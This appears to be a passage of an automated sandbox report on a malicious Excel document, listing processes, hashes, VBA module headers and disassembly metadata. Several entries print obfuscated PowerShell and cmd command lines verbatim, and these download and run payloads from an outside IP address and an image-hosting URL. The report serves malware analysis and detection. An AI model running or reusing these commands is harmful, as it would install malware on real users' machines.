                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                                            Imagebase:0xaa0000
                                                                                            File size:2'525'680 bytes
                                                                                            MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:00:57:53
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"
                                                                                            Imagebase:0x13fa00000
                                                                                            File size:2'758'280 bytes
                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:00:57:54
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP"
                                                                                            Imagebase:0x13ff00000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:00:58:00
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
                                                                                            Imagebase:0xff5c0000
                                                                                            File size:168'960 bytes
                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:00:58:01
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:00:58:06
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                            Imagebase:0xf10000
                                                                                            File size:9'805'808 bytes
                                                                                            MD5 hash:326A645391A97C760B60C558A35BB068
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:00:58:06
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                            Imagebase:0x13fcd0000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:18
                                                                                            Start time:00:58:13
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x4a810000
                                                                                            File size:345'088 bytes
                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:20
                                                                                            Start time:00:58:13
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:00:58:18
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
                                                                                            Imagebase:0x13fb30000
                                                                                            File size:2'758'280 bytes
                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:22
                                                                                            Start time:00:58:18
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP"
                                                                                            Imagebase:0x13f200000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:25
                                                                                            Start time:00:58:24
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
                                                                                            Imagebase:0xffc30000
                                                                                            File size:168'960 bytes
                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:26
                                                                                            Start time:00:58:24
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true


                                                                                            Module: Sheet1

                                                                                            Declaration
                                                                                            Attribute VB_Name = "Sheet1"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            Attribute VB_Name = "Sheet1"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True

                                                                                            Module: Sheet2

                                                                                            Declaration
                                                                                            Attribute VB_Name = "Sheet2"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            Attribute VB_Name = "Sheet2"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True

                                                                                            Module: ThisWorkbook

                                                                                            Declaration
                                                                                            Attribute VB_Name = "ThisWorkbook"
                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            Attribute VB_Name = "ThisWorkbook"
                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.422499192.0000000002A80000.00000010.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_2a80000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 02add810ccdb0647114194c8c4e24652f975610e5baaf30fe9777fd5a867665e
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:

                                                                                              Execution Graph

                                                                                              Execution Coverage:5.1%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 3797 7fe899a7ae1 3798 7fe899a7af1 URLDownloadToFileW 3797->3798 3800 7fe899a7c00 3798->3800

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 97 7fe899a7018-7fe899a7ba1 101 7fe899a7bab-7fe899a7bb1 97->101 102 7fe899a7ba3-7fe899a7ba8 97->102 103 7fe899a7bbb-7fe899a7bfe URLDownloadToFileW 101->103 104 7fe899a7bb3-7fe899a7bb8 101->104 102->101 105 7fe899a7c06-7fe899a7c23 103->105 106 7fe899a7c00 103->106 104->103 106->105
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451861026.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DownloadFile
                                                                                              • String ID:
                                                                                              • API String ID: 1407266417-0
                                                                                              • Opcode ID: e31f340fe9d15ba8a661b93e1673a535d6177e9401083e2848abd43506f0e4ea
                                                                                              • Instruction ID: a9146773a77b25eefd3a9b309086170ebea80d6183c814e77ed7d1106400197e
                                                                                              • Opcode Fuzzy Hash: e31f340fe9d15ba8a661b93e1673a535d6177e9401083e2848abd43506f0e4ea
                                                                                              • Instruction Fuzzy Hash: 1E31917191CA5C9FDB58EF5CD8857A9B7E1FB59311F00826ED04DD3661CB70B8068B81

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 88M$XhT
                                                                                              • API String ID: 0-50409379
                                                                                              • Opcode ID: fefb3978c1796a7e074846658e26f17aa5d99cafd11b13a388bc4a09a42954d4
                                                                                              • Instruction ID: 8d98bb7f5c5142bd370df2cbddd9ecbe653b82d6879ac57064738ea85403c65d
                                                                                              • Opcode Fuzzy Hash: fefb3978c1796a7e074846658e26f17aa5d99cafd11b13a388bc4a09a42954d4
                                                                                              • Instruction Fuzzy Hash: 4381012190EBD60FE753937858256A57FF1DF97250B1E41EBC4C9CB1A3D909AC0AC3A2

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: V
                                                                                              • API String ID: 0-1342839628
                                                                                              • Opcode ID: 8f990c74bde9ca25ccf3ff8e97b3607dc2d435efc52b0cb14f1057682522f074
                                                                                              • Instruction ID: d8b2dab6c6ace30f0409aab27746c8bc98de322580c6b754dbb7b40ba98c53d6
                                                                                              • Opcode Fuzzy Hash: 8f990c74bde9ca25ccf3ff8e97b3607dc2d435efc52b0cb14f1057682522f074
                                                                                              • Instruction Fuzzy Hash: 00D1043180E7C91FD347972898156B67FA4EF87260F0911EBD48DCB0A3D619AD1AC3A2

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451861026.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DownloadFile
                                                                                              • String ID:
                                                                                              • API String ID: 1407266417-0
                                                                                              • Opcode ID: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                              • Instruction ID: af85bc2c7650ea663aad5d2b185252519e16bf38f8e3e5b2e73dcd71df745be7
                                                                                              • Opcode Fuzzy Hash: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                              • Instruction Fuzzy Hash: 4341F57180CB889FDB1ADB589C457AABBF0FB56321F0482AFD089D7562CB646806C781

                                                                                              Control-flow Graph

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04e7395453ea373c5db482dc0d4d8e10faca3a540647f0ff4d281faa28fcd79e
                                                                                              • Instruction ID: a57bb54a24261e815b2a5dc2bea573be520fda7eda493a9b1915ea966e1915b7
                                                                                              • Opcode Fuzzy Hash: 04e7395453ea373c5db482dc0d4d8e10faca3a540647f0ff4d281faa28fcd79e
                                                                                              • Instruction Fuzzy Hash: 4D22F43090CB895FE799EB2C84556697BE2FF8A344F2401EED48EC72A3DA24AC55C741

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04121dd8ba6a47891dcf012f52e200de14ee2472430cdcc4fff1521073a37913
                                                                                              • Instruction ID: 751f3939d637c6ac0fbe3106570331dc534f20f5d60fd57048e667f00922a20e
                                                                                              • Opcode Fuzzy Hash: 04121dd8ba6a47891dcf012f52e200de14ee2472430cdcc4fff1521073a37913
                                                                                              • Instruction Fuzzy Hash: 00C1683090DBCA0FE74AA76C54116BA7FE2EF46744F1501EBD48EC71A3D618AC26C3A1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0be2b789e3bd11a7316a78662a5c762ca40170e4c6852bb2441783c4b4d38d53
                                                                                              • Instruction ID: 79f6c329d16720dba1d4cd5201d1870fabf9f30416e2d7ed85785fe86ab2f82b
                                                                                              • Opcode Fuzzy Hash: 0be2b789e3bd11a7316a78662a5c762ca40170e4c6852bb2441783c4b4d38d53
                                                                                              • Instruction Fuzzy Hash: 9391E220A0DBC90FE757973C58642657FE2EF4B254F2901EBC48ECB1A3EA189C5AC351
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b3907e0014b28db3351010b321ae9e390cf548968deb6c9b58c999422fedd265
                                                                                              • Instruction ID: 5b3a3eee438105958a077073c2cf76a93f56031a0a63e0c44c8346de14d3b1b2
                                                                                              • Opcode Fuzzy Hash: b3907e0014b28db3351010b321ae9e390cf548968deb6c9b58c999422fedd265
                                                                                              • Instruction Fuzzy Hash: 2DA1352080EBC91FD747A77868142A67FF1EF4B254F1A01EBD48DCB1A3D6199D1AC362
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000003.482124589.00000000022E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_3_22e0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: e5181ab03537cb1ffb0d74bc904cd51fe7f23bb89f3ece4bbeba0608932e0d80
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash: